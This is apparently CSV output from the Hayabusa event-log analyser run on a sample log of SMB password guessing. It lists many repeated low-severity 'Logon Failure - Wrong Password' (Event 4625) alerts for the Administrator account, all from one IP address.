NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.081 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.574 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.199 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.693 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:31.187 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
